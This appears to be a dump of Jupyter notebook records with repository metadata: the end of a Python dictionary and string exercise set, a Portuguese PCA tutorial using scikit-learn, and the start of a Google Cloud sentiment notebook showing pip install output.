"**Question2**\n<br>Write a function that converts a dictionary into a list of keys-values tuples.\n<br>Examples\n<br>dict_to_list({\n<br>\"D\": 1,\n<br>\"B\": 2,\n<br>\"C\": 3\n<br>}) ➞ [(\"B\", 2), (\"C\", 3), (\"D\", 1)]\n<br>dict_to_list({\n<br>\"likes\": 2,\n<br>\"dislikes\": 3,\n<br>\"followers\": 10\n<br>}) ➞ [(\"dislikes\", 3), (\"followers\", 10), (\"likes\", 2)]\n<br>\n<br>Notes\n<br>Return the elements in the list in alphabetical order.",
"_____no_output_____"
],
[
"**Answer:**",
"_____no_output_____"
]
],
[
[
"def dict_to_list(x):\n return sorted(x.items(), key=lambda k: k[0])\n\nfor x in [{\"D\": 1, \"B\": 2, \"C\": 3}, {\"likes\": 2, \"dislikes\": 3, \"followers\": 10}]:\n print(dict_to_list(x))",
"[('B', 2), ('C', 3), ('D', 1)]\n[('dislikes', 3), ('followers', 10), ('likes', 2)]\n"
]
],
[
[
"**Question3**\n<br>Write a function that creates a dictionary with each (key, value) pair being the (lower case,\nupper case) versions of a letter, respectively.\n<br>**Examples**\n<br>mapping([\"p\", \"s\"]) ➞ { \"p\": \"P\", \"s\": \"S\" }\n<br>mapping([\"a\", \"b\", \"c\"]) ➞ { \"a\": \"A\", \"b\": \"B\", \"c\": \"C\" }\n<br>mapping([\"a\", \"v\", \"y\", \"z\"]) ➞ { \"a\": \"A\", \"v\": \"V\", \"y\": \"Y\", \"z\": \"Z\" }\n<br>\n<br>Notes\n<br>All of the letters in the input list will always be lowercase.",
"_____no_output_____"
],
[
"**Answer:**",
"_____no_output_____"
]
],
[
[
"def mapping(x):\n return {i: i.upper() for i in x}\n\nfor x in [[\"p\", \"s\"], [\"a\", \"b\", \"c\"], [\"a\", \"v\", \"y\", \"z\"]]:\n print(mapping(x))",
"{'p': 'P', 's': 'S'}\n{'a': 'A', 'b': 'B', 'c': 'C'}\n{'a': 'A', 'v': 'V', 'y': 'Y', 'z': 'Z'}\n"
]
],
[
[
"**Question4**\n<br>Write a function, that replaces all vowels in a string with a specified vowel.\n<br>**Examples**\n<br>vow_replace(\"apples and bananas\", \"u\") ➞ \"upplus und bununus\"\n<br>vow_replace(\"cheese casserole\", \"o\") ➞ \"chooso cossorolo\"\n<br>vow_replace(\"stuffed jalapeno poppers\", \"e\") ➞ \"steffed jelepene peppers\"\n<br>\n<br>Notes\n<br>All words will be lowercase. Y is not considered a vowel.",
"_____no_output_____"
],
[
"**Answer:**",
"_____no_output_____"
]
],
[
[
"def vow_replace(x_text, x_vowel):\n temp_list = [x_vowel if i in ['a', 'e', 'i', 'o', 'u'] \n else i for i in list(x_text)]\n return ''.join(temp_list)\n\nfor x_text, x_vowel in [(\"apples and bananas\", \"u\"), \n (\"cheese casserole\", \"o\"), \n (\"stuffed jalapeno poppers\", \"e\")]:\n print(vow_replace(x_text, x_vowel))",
"upplus und bununus\nchooso cossorolo\nsteffed jelepene peppers\n"
]
],
[
[
"**Question5**\n<br>Create a function that takes a string as input and capitalizes a letter if its ASCII code is even\nand returns its lower case version if its ASCII code is odd.\n<br>**Examples**\n<br>ascii_capitalize(\"to be or not to be!\") ➞ \"To Be oR NoT To Be!\"\n<br>ascii_capitalize(\"THE LITTLE MERMAID\") ➞ \"THe LiTTLe meRmaiD\"\n<br>ascii_capitalize(\"Oh what a beautiful morning.\") ➞ \"oH wHaT a BeauTiFuL\nmoRNiNg.\"",
"_____no_output_____"
],
[
"**Answer:**",
"_____no_output_____"
]
],
[
[
"def ascii_capitalize(x):\n temp_list = [i.upper() if ord(i)%2==0 else i.lower() for i in list(x)]\n return ''.join(temp_list)\n\nfor x in [\"to be or not to be!\", \"THE LITTLE MERMAID\", \"Oh what a beautiful morning.\"]:\n print(ascii_capitalize(x))",
"To Be oR NoT To Be!\nTHe LiTTLe meRmaiD\noH wHaT a BeauTiFuL moRNiNg.\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
]
] |
cb50133b8787019cf8637e754f1b37819839383e | 157,999 | ipynb | Jupyter Notebook | PCA.ipynb | fabiobarreto-data-science/Data-Science---Let-s-Code | df60c8351141d3fcbd96589c4dd27e1054fed712 | [
"MIT"
] | null | null | null | PCA.ipynb | fabiobarreto-data-science/Data-Science---Let-s-Code | df60c8351141d3fcbd96589c4dd27e1054fed712 | [
"MIT"
] | null | null | null | PCA.ipynb | fabiobarreto-data-science/Data-Science---Let-s-Code | df60c8351141d3fcbd96589c4dd27e1054fed712 | [
"MIT"
] | null | null | null | 42.495697 | 20,992 | 0.454028 | [
[
[
"# PCA (Principal Component Analysis)\n---\n\n<img src=\"https://selecao.letscode.com.br/favicon.png\" width=\"40px\" style=\"position: absolute; top: 15px; right: 40px; border-radius: 5px;\" />\n\n## Introdução\n\nSão cada vez mais comuns a elevada quantidade de variáveis explicativas, porém quanto maior a quantidade de variáveis, mais difícil a interpretação da solução. A análise de componentes principais (Principal Component Analysis, PCA) é a técnica para reduzir a dimensionalidade desses conjuntos de dados, aumentando a interpretabilidade concomitante a minimização da perda de informações. Isso é feito criando novas variáveis não correlacionadas, preservando o máximo de variabilidade possível. Preservar o máximo de variabilidade possível, se traduz em encontrar novas variáveis que são funções lineares daquelas no conjunto de dados original.\n\n\nEm regressão linear, geralmente determinamos a linha de melhor ajuste ao conjunto de dados, mas aqui no PCA, determinamos várias linhas ortogonais entre si no espaço n-dimensional, de melhor ajuste ao conjunto de dados. Ortogonal significa que essas linhas estão em ângulo reto entre si. O número de dimensões será o mesmo que o número de variáveis. Por exemplo, um conjunto de dados com 3 variáveis terá espaço tridimensional.\n\nA análise de componentes principais é essencialmente apenas uma transformação de coordenadas. Considerando dados bidimencionais, por exemplo, os dados originais são plotados em um eixo X' e um eixo Y'. O método de PCA procura girar esses dois eixos para que o novo eixo X fique ao longo da direção da variação máxima nos dados. Como a técnica exige que os eixos sejam perpendiculares, em duas dimensões, a escolha de X' determinará Y'. Você obtém os dados transformados lendo os valores x e y deste novo conjunto de eixos, X 'e Y'. Para mais de duas dimensões, o primeiro eixo está na direção da maior variação; o segundo, na direção da segunda maior variação; e assim por diante.\n\n<img src=\"https://miro.medium.com/max/2625/1*ba0XpZtJrgh7UpzWcIgZ1Q.jpeg\" alt=\"\" width=\"40%\" style=\"display: block; margin: 20px auto;\" />\n\n## Procedimento para uma análise de componentes principais\n\nConsidere a matriz $X_{n \\times p}$ composta por observações de $p$ características de $n$ indivíduos de uma população. As características observadas são representadas pelas variáveis $X_1, X_2, X_3, \\cdots, X_p$.\n\n\n$$\n X = \\left [ \\begin{array}{ccccc}\nx_{11} & x_{12} & x_{13} & \\cdots & x_{1p}\\\\ \nx_{21} & x_{22} & x_{23} & \\cdots & x_{2p}\\\\ \n\\vdots & \\vdots & \\vdots & \\cdots & \\vdots \\\\\nx_{n1} & x_{n2} & x_{n3} & \\cdots & x_{np}\\\\ \n \\end{array} \\right ] \n$$\n\n### Passo 1\n\nPara dados em que as variáveis $X_i$ estão em escalas diferentes (por exemplo $X_1$ representa o valor de um carro e $X_2$ o consumo de gasolina), é necessário padronizar os dados. Isso porque os componentes são influenciados pela escala das variáveis, justamente porque as matrizes de covariâncias, $\\Sigma$ ou $\\hat{\\Sigma} = S$, são sensíveis à escala de um par de variáveis. Considere $\\bar{x_j}$ a média da variável $X_j$; $s(X_j)$ o desvio padrão de $X_j$; sendo $i = 1, 2,3,4,\\cdots, n$ e $j = 1, 2,3,4,\\cdots, p$. Com isso, a padronização pode ser realizada por meio da equação abaixo: \n\n- Média 0 e desvio padrão 1: \n\n$$ x'_{ij}= \\frac{x_{ij}-\\bar{X_j}}{s(X_j)} $$ \n\n<br>\n\n### Passo 2\n\nCalcular a matriz de **covariância** ou **correlação**. Caso as variáveis estejam em escalas diferentes, é possível calcular a matriz de correlação nos dados originais. Esta possibilidade se deve ao fato de que a matriz de covariâncias das variáveis padronizadas é igual a matriz de correlação das variáveis originais. \n\n$$\n S = \\left [ \\begin{array}{ccccc}\n\\hat{Var}(x_1) & \\hat{Cov}(x_1x_2) & \\hat{Cov}(x_1x_3) & \\cdots & \\hat{Cov}(x_1x_p)\\\\ \n\\hat{Cov}(x_2x_1) &\\hat{Var}(x_2)& \\hat{Cov}(x_2x_3) & \\cdots & \\hat{Cov}(x_2x_p)\\\\ \n\\vdots & \\vdots & \\vdots & \\cdots & \\vdots \\\\\n\\hat{Cov}(x_px_1) & \\hat{Cov}(x_px_2) & \\hat{Cov}(x_px_3) & \\cdots & \\hat{Var}(x_p)\\\\ \n \\end{array} \\right ] \n$$\n\n<br>\n<br>\n\n$$\n R = \\left [ \\begin{array}{ccccc}\n1 & r(x_1x_2) & r(x_1x_3) & \\cdots & r(x_1x_p)\\\\ \nr(x_2x_1) & 1 & r(x_2x_3) & \\cdots & r(x_2x_p)\\\\ \n\\vdots & \\vdots & \\vdots & \\cdots & \\vdots \\\\\nr(x_px_1) & r(x_px_2) & r(x_px_3) & \\cdots & 1\\\\ \n \\end{array} \\right ] \n$$\n\nEm que:\n\n$$\n \\begin{array}{ccc}\n\\hat{Var}(x_j) = \\frac{\\sum_{i=1}^{n}(x_{ij}-\\bar{x}_j}{n-1}, & \n\\hat{Cov}(x_{j1},x_{j2}) = \\frac{\\sum_{i=1}^n(x_{ij1}-\\bar{x_{j1}})(x_{ij2}-\\bar{x_{j2}})}{n-1}, &\nr(x_{j1},x_{j2}) = \\frac{\\hat{Cov}(x_{j1},x_{j2})}{S_{xj1}S_{xj2}}\n \\end{array} \n$$\n\n<br>\n\n### Passo 3\n\nAs componentes principais são determinadas através da equação característica da matriz S ou R:\n\n$$det[R - \\lambda I]= 0 $$\n\nEm que $I$ é a matriz identidade de dimensão $p\\times p$. \n\nSe R ou S tem posto completo igual a $p$, então $det[R - \\lambda I]= 0$, que pode ser reescrito como $\\mid R - \\lambda I \\mid = 0$, terá $p$ soluções. Lembrando que ter posto completo significa que nenhuma coluna é combinação linear de outra.\n\nConsidere que $\\lambda_1,\\lambda_2,\\lambda_3, \\cdots, \\lambda_p$ sejam as raízes da equação característica de R ou S, então temos que $\\lambda_1 > \\lambda_2 > \\lambda_3 > \\cdots, \\lambda_p$. Chamamos $\\lambda_i$ de autovalor. Além disso, para cada autovalor há um autovetor $\\tilde{a}_i$ associado.\n\n$$\n \\tilde{a}_i = \\left [ \\begin{array}{c}\na_{i1}\\\\ \na_{i2}\\\\ \n\\vdots \\\\\na_{ip} \\\\ \n \\end{array} \\right ] \n$$\n\nO cálculo do autovetor $\\tilde{a}_i$, pode ser realizado considerando a seguinte propriedade:\n\n$$ R\\tilde{a}_i = \\lambda_i \\tilde{a}_i $$\n\nEste resultado deve ser normalizado:\n\n$$ a_i = \\frac{\\tilde{a}_i }{\\mid \\tilde{a}_i \\mid}$$\n\ndesta forma a soma dos quadrados dos coeficientes é igual a 1 e são ortogonais entre si. \n\n<br>\n\n### Passo 4\nO cálculo da i-ésima componente principal é dado por:\n\n$$Z_i = a_{i1}X_1 + a_{i2}X_2 + a_{i3}X_3 + \\cdots + a_{ip}X_p $$\n\nem que $a_{i1}$ são as componetes do autovetor $a_i$ associado ao autovalor $\\lambda_i$.",
"_____no_output_____"
],
[
"## Carregando o Dataset e Realizando uma Análise Exploratória dos Dados\n---",
"_____no_output_____"
]
],
[
[
"# Bibliotecas\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.datasets import load_breast_cancer",
"_____no_output_____"
],
[
"# Carregando dataset do load_breast_cancer\ndata = load_breast_cancer()",
"_____no_output_____"
],
[
"type(data)",
"_____no_output_____"
],
[
"data['data']",
"_____no_output_____"
],
[
"pd.DataFrame(data['data'])",
"_____no_output_____"
],
[
"data.keys()",
"_____no_output_____"
],
[
"data['feature_names']",
"_____no_output_____"
],
[
"df = pd.DataFrame(data['data'], columns=data['feature_names'])",
"_____no_output_____"
],
[
"df.head()",
"_____no_output_____"
],
[
"data['target']",
"_____no_output_____"
],
[
"df.head()",
"_____no_output_____"
],
[
"df['target'] = data['target']",
"_____no_output_____"
],
[
"df.head()",
"_____no_output_____"
]
],
[
[
"### Passo 1: Padronização do nosso conjunto de dados",
"_____no_output_____"
]
],
[
[
"# Separando apenas as features para transformar (X)\nX = df.drop('target', axis=1)",
"_____no_output_____"
],
[
"X.head()",
"_____no_output_____"
],
[
"from sklearn.preprocessing import StandardScaler",
"_____no_output_____"
],
[
"scaler = StandardScaler()",
"_____no_output_____"
],
[
"scaler.fit(X) # FIT é calcular a média e a variância de cada uma das variáveis.",
"_____no_output_____"
],
[
"scaler.mean_",
"_____no_output_____"
],
[
"scaler.var_",
"_____no_output_____"
],
[
"X_scaled = scaler.transform(X)",
"_____no_output_____"
],
[
"X_scaled # Transformou em média ZERO e desvio padrão UM",
"_____no_output_____"
],
[
"pd.DataFrame(X_scaled).describe()",
"_____no_output_____"
]
],
[
[
"### Resumindo a utilização do StandardScaler...",
"_____no_output_____"
]
],
[
[
"# OUTRO MÉTODO - MAIS RÁPIDO!!\nscaler = StandardScaler()",
"_____no_output_____"
],
[
"X_scaled = scaler.fit_transform(X)",
"_____no_output_____"
],
[
"X_scaled",
"_____no_output_____"
]
],
[
[
"### Passo 2: Calcular a matriz de covariância [...]",
"_____no_output_____"
],
[
"### Utilizando a biblioteca do Sklearn\n\n1. Padronizar as *features*\n2. Aplicar o PCA",
"_____no_output_____"
],
[
"#### Aplicando o PCA\nhttps://scikit-learn.org/stable/modules/generated/sklearn.decomposition.PCA.html",
"_____no_output_____"
]
],
[
[
"from sklearn.decomposition import PCA",
"_____no_output_____"
],
[
"pca = PCA()",
"_____no_output_____"
],
[
"pca.fit(X_scaled) # Esse FIT vai calcular os novos eixos",
"_____no_output_____"
]
],
[
[
"#### Obtendo a matriz de dados transformada",
"_____no_output_____"
]
],
[
[
"X_pca = pca.transform(X_scaled) # Vai padronizar",
"_____no_output_____"
],
[
"X_pca # As features convertidas em novos eixos com outros valores",
"_____no_output_____"
],
[
"X.head() # Features originais",
"_____no_output_____"
],
[
"X_pca = pd.DataFrame(X_pca, columns=[f'C{i}' for i in range(1, X.shape[1] + 1)])",
"_____no_output_____"
],
[
"X_pca",
"_____no_output_____"
]
],
[
[
"#### Analisando a variância explicada",
"_____no_output_____"
]
],
[
[
"pca.explained_variance_",
"_____no_output_____"
],
[
"pca.explained_variance_ratio_ # Variância em percentuais",
"_____no_output_____"
],
[
"pca.explained_variance_ratio_.cumsum() # Soma acumulada",
"_____no_output_____"
],
[
"plt.figure(figsize=(20, 8))\nplt.plot(X_pca.columns, pca.explained_variance_ratio_.cumsum())\nplt.bar(X_pca.columns, pca.explained_variance_ratio_)",
"_____no_output_____"
]
],
[
[
"#### Realizando a transformada inversa",
"_____no_output_____"
]
],
[
[
"pd.DataFrame(X_scaled)",
"_____no_output_____"
],
[
"X_inverted = pca.inverse_transform(X_pca)",
"_____no_output_____"
],
[
"pd.DataFrame(X_inverted)",
"_____no_output_____"
],
[
"X_original = scaler.inverse_transform(X_inverted)",
"_____no_output_____"
],
[
"pd.DataFrame(X_original)",
"_____no_output_____"
],
[
"X.head()",
"_____no_output_____"
]
],
[
[
"### Aplicando o PCA com otimização de variáveis",
"_____no_output_____"
]
],
[
[
"pca = PCA(n_components=0.95) # Corte as minhas variáveis para obter 95% das informações das originais",
"_____no_output_____"
],
[
"X_pca_optimized = pca.fit_transform(X_scaled)",
"_____no_output_____"
],
[
"X_pca_optimized.shape",
"_____no_output_____"
],
[
"X_pca_optimized.shape",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
]
] |
cb50379c97e4a72d73996eec5878f2db7e84fbff | 35,495 | ipynb | Jupyter Notebook | googlesentiments.ipynb | Estampille/Cognitive-Services-Vision-Solution-Templates | ab32a817aea495547904d53926f3e15699275967 | [
"MIT"
] | null | null | null | googlesentiments.ipynb | Estampille/Cognitive-Services-Vision-Solution-Templates | ab32a817aea495547904d53926f3e15699275967 | [
"MIT"
] | null | null | null | googlesentiments.ipynb | Estampille/Cognitive-Services-Vision-Solution-Templates | ab32a817aea495547904d53926f3e15699275967 | [
"MIT"
] | null | null | null | 52.198529 | 387 | 0.545654 | [
[
[
"<a href=\"https://colab.research.google.com/github/Estampille/Cognitive-Services-Vision-Solution-Templates/blob/master/googlesentiments.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
]
],
[
[
"\n\n!pip install --upgrade google-api-python-client\n!pip install google-cloud-language\n!pip3 install --upgrade google-cloud-storage\n!pip install --upgrade pip",
"Requirement already satisfied: google-api-python-client in /usr/local/lib/python3.7/dist-packages (2.0.2)\nRequirement already satisfied: google-auth<2dev,>=1.16.0 in /usr/local/lib/python3.7/dist-packages (from google-api-python-client) (1.27.1)\nRequirement already satisfied: uritemplate<4dev,>=3.0.0 in /usr/local/lib/python3.7/dist-packages (from google-api-python-client) (3.0.1)\nRequirement already satisfied: six<2dev,>=1.13.0 in /usr/local/lib/python3.7/dist-packages (from google-api-python-client) (1.15.0)\nRequirement already satisfied: google-api-core<2dev,>=1.21.0 in /usr/local/lib/python3.7/dist-packages (from google-api-python-client) (1.26.1)\nRequirement already satisfied: google-auth-httplib2>=0.0.3 in /usr/local/lib/python3.7/dist-packages (from google-api-python-client) (0.0.4)\nRequirement already satisfied: httplib2<1dev,>=0.15.0 in /usr/local/lib/python3.7/dist-packages (from google-api-python-client) (0.17.4)\nRequirement already satisfied: packaging>=14.3 in /usr/local/lib/python3.7/dist-packages (from google-api-core<2dev,>=1.21.0->google-api-python-client) (20.9)\nRequirement already satisfied: pytz in /usr/local/lib/python3.7/dist-packages (from google-api-core<2dev,>=1.21.0->google-api-python-client) (2018.9)\nRequirement already satisfied: setuptools>=40.3.0 in /usr/local/lib/python3.7/dist-packages (from google-api-core<2dev,>=1.21.0->google-api-python-client) (54.1.2)\nRequirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /usr/local/lib/python3.7/dist-packages (from google-api-core<2dev,>=1.21.0->google-api-python-client) (1.53.0)\nRequirement already satisfied: requests<3.0.0dev,>=2.18.0 in /usr/local/lib/python3.7/dist-packages (from google-api-core<2dev,>=1.21.0->google-api-python-client) (2.23.0)\nRequirement already satisfied: protobuf>=3.12.0 in /usr/local/lib/python3.7/dist-packages (from google-api-core<2dev,>=1.21.0->google-api-python-client) (3.12.4)\nRequirement already satisfied: rsa<5,>=3.1.4 in /usr/local/lib/python3.7/dist-packages (from google-auth<2dev,>=1.16.0->google-api-python-client) (4.7.2)\nRequirement already satisfied: cachetools<5.0,>=2.0.0 in /usr/local/lib/python3.7/dist-packages (from google-auth<2dev,>=1.16.0->google-api-python-client) (4.2.1)\nRequirement already satisfied: pyasn1-modules>=0.2.1 in /usr/local/lib/python3.7/dist-packages (from google-auth<2dev,>=1.16.0->google-api-python-client) (0.2.8)\nRequirement already satisfied: pyparsing>=2.0.2 in /usr/local/lib/python3.7/dist-packages (from packaging>=14.3->google-api-core<2dev,>=1.21.0->google-api-python-client) (2.4.7)\nRequirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /usr/local/lib/python3.7/dist-packages (from pyasn1-modules>=0.2.1->google-auth<2dev,>=1.16.0->google-api-python-client) (0.4.8)\nRequirement already satisfied: urllib3!=1.25.0,!=1.25.1,<1.26,>=1.21.1 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0dev,>=2.18.0->google-api-core<2dev,>=1.21.0->google-api-python-client) (1.24.3)\nRequirement already satisfied: idna<3,>=2.5 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0dev,>=2.18.0->google-api-core<2dev,>=1.21.0->google-api-python-client) (2.10)\nRequirement already satisfied: chardet<4,>=3.0.2 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0dev,>=2.18.0->google-api-core<2dev,>=1.21.0->google-api-python-client) (3.0.4)\nRequirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0dev,>=2.18.0->google-api-core<2dev,>=1.21.0->google-api-python-client) (2020.12.5)\nRequirement already satisfied: google-cloud-language in /usr/local/lib/python3.7/dist-packages (1.2.0)\nRequirement already satisfied: google-api-core[grpc]<2.0.0dev,>=1.6.0 in /usr/local/lib/python3.7/dist-packages (from google-cloud-language) (1.26.1)\nRequirement already satisfied: requests<3.0.0dev,>=2.18.0 in /usr/local/lib/python3.7/dist-packages (from google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (2.23.0)\nRequirement already satisfied: protobuf>=3.12.0 in /usr/local/lib/python3.7/dist-packages (from google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (3.12.4)\nRequirement already satisfied: setuptools>=40.3.0 in /usr/local/lib/python3.7/dist-packages (from google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (54.1.2)\nRequirement already satisfied: google-auth<2.0dev,>=1.21.1 in /usr/local/lib/python3.7/dist-packages (from google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (1.27.1)\nRequirement already satisfied: pytz in /usr/local/lib/python3.7/dist-packages (from google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (2018.9)\nRequirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /usr/local/lib/python3.7/dist-packages (from google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (1.53.0)\nRequirement already satisfied: packaging>=14.3 in /usr/local/lib/python3.7/dist-packages (from google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (20.9)\nRequirement already satisfied: six>=1.13.0 in /usr/local/lib/python3.7/dist-packages (from google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (1.15.0)\nRequirement already satisfied: grpcio<2.0dev,>=1.29.0 in /usr/local/lib/python3.7/dist-packages (from google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (1.32.0)\nRequirement already satisfied: rsa<5,>=3.1.4 in /usr/local/lib/python3.7/dist-packages (from google-auth<2.0dev,>=1.21.1->google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (4.7.2)\nRequirement already satisfied: cachetools<5.0,>=2.0.0 in /usr/local/lib/python3.7/dist-packages (from google-auth<2.0dev,>=1.21.1->google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (4.2.1)\nRequirement already satisfied: pyasn1-modules>=0.2.1 in /usr/local/lib/python3.7/dist-packages (from google-auth<2.0dev,>=1.21.1->google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (0.2.8)\nRequirement already satisfied: pyparsing>=2.0.2 in /usr/local/lib/python3.7/dist-packages (from packaging>=14.3->google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (2.4.7)\nRequirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /usr/local/lib/python3.7/dist-packages (from pyasn1-modules>=0.2.1->google-auth<2.0dev,>=1.21.1->google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (0.4.8)\nRequirement already satisfied: urllib3!=1.25.0,!=1.25.1,<1.26,>=1.21.1 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (1.24.3)\nRequirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (2020.12.5)\nRequirement already satisfied: idna<3,>=2.5 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (2.10)\nRequirement already satisfied: chardet<4,>=3.0.2 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<2.0.0dev,>=1.6.0->google-cloud-language) (3.0.4)\nRequirement already satisfied: google-cloud-storage in /usr/local/lib/python3.7/dist-packages (1.36.2)\nRequirement already satisfied: google-resumable-media<2.0dev,>=1.2.0 in /usr/local/lib/python3.7/dist-packages (from google-cloud-storage) (1.2.0)\nRequirement already satisfied: google-cloud-core<2.0dev,>=1.4.1 in /usr/local/lib/python3.7/dist-packages (from google-cloud-storage) (1.6.0)\nRequirement already satisfied: requests<3.0.0dev,>=2.18.0 in /usr/local/lib/python3.7/dist-packages (from google-cloud-storage) (2.23.0)\nRequirement already satisfied: google-auth<2.0dev,>=1.11.0 in /usr/local/lib/python3.7/dist-packages (from google-cloud-storage) (1.27.1)\nRequirement already satisfied: pyasn1-modules>=0.2.1 in /usr/local/lib/python3.7/dist-packages (from google-auth<2.0dev,>=1.11.0->google-cloud-storage) (0.2.8)\nRequirement already satisfied: setuptools>=40.3.0 in /usr/local/lib/python3.7/dist-packages (from google-auth<2.0dev,>=1.11.0->google-cloud-storage) (54.1.2)\nRequirement already satisfied: six>=1.9.0 in /usr/local/lib/python3.7/dist-packages (from google-auth<2.0dev,>=1.11.0->google-cloud-storage) (1.15.0)\nRequirement already satisfied: cachetools<5.0,>=2.0.0 in /usr/local/lib/python3.7/dist-packages (from google-auth<2.0dev,>=1.11.0->google-cloud-storage) (4.2.1)\nRequirement already satisfied: rsa<5,>=3.1.4 in /usr/local/lib/python3.7/dist-packages (from google-auth<2.0dev,>=1.11.0->google-cloud-storage) (4.7.2)\nRequirement already satisfied: google-api-core<2.0.0dev,>=1.21.0 in /usr/local/lib/python3.7/dist-packages (from google-cloud-core<2.0dev,>=1.4.1->google-cloud-storage) (1.26.1)\nRequirement already satisfied: protobuf>=3.12.0 in /usr/local/lib/python3.7/dist-packages (from google-api-core<2.0.0dev,>=1.21.0->google-cloud-core<2.0dev,>=1.4.1->google-cloud-storage) (3.12.4)\nRequirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /usr/local/lib/python3.7/dist-packages (from google-api-core<2.0.0dev,>=1.21.0->google-cloud-core<2.0dev,>=1.4.1->google-cloud-storage) (1.53.0)\nRequirement already satisfied: packaging>=14.3 in /usr/local/lib/python3.7/dist-packages (from google-api-core<2.0.0dev,>=1.21.0->google-cloud-core<2.0dev,>=1.4.1->google-cloud-storage) (20.9)\nRequirement already satisfied: pytz in /usr/local/lib/python3.7/dist-packages (from google-api-core<2.0.0dev,>=1.21.0->google-cloud-core<2.0dev,>=1.4.1->google-cloud-storage) (2018.9)\nRequirement already satisfied: google-crc32c<2.0dev,>=1.0 in /usr/local/lib/python3.7/dist-packages (from google-resumable-media<2.0dev,>=1.2.0->google-cloud-storage) (1.1.2)\nRequirement already satisfied: cffi>=1.0.0 in /usr/local/lib/python3.7/dist-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<2.0dev,>=1.2.0->google-cloud-storage) (1.14.5)\nRequirement already satisfied: pycparser in /usr/local/lib/python3.7/dist-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<2.0dev,>=1.2.0->google-cloud-storage) (2.20)\nRequirement already satisfied: pyparsing>=2.0.2 in /usr/local/lib/python3.7/dist-packages (from packaging>=14.3->google-api-core<2.0.0dev,>=1.21.0->google-cloud-core<2.0dev,>=1.4.1->google-cloud-storage) (2.4.7)\nRequirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /usr/local/lib/python3.7/dist-packages (from pyasn1-modules>=0.2.1->google-auth<2.0dev,>=1.11.0->google-cloud-storage) (0.4.8)\nRequirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2020.12.5)\nRequirement already satisfied: urllib3!=1.25.0,!=1.25.1,<1.26,>=1.21.1 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (1.24.3)\nRequirement already satisfied: chardet<4,>=3.0.2 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (3.0.4)\nRequirement already satisfied: idna<3,>=2.5 in /usr/local/lib/python3.7/dist-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2.10)\nRequirement already satisfied: pip in /usr/local/lib/python3.7/dist-packages (21.0.1)\n"
],
[
"!pip install word2number\n\n!pip install contractions",
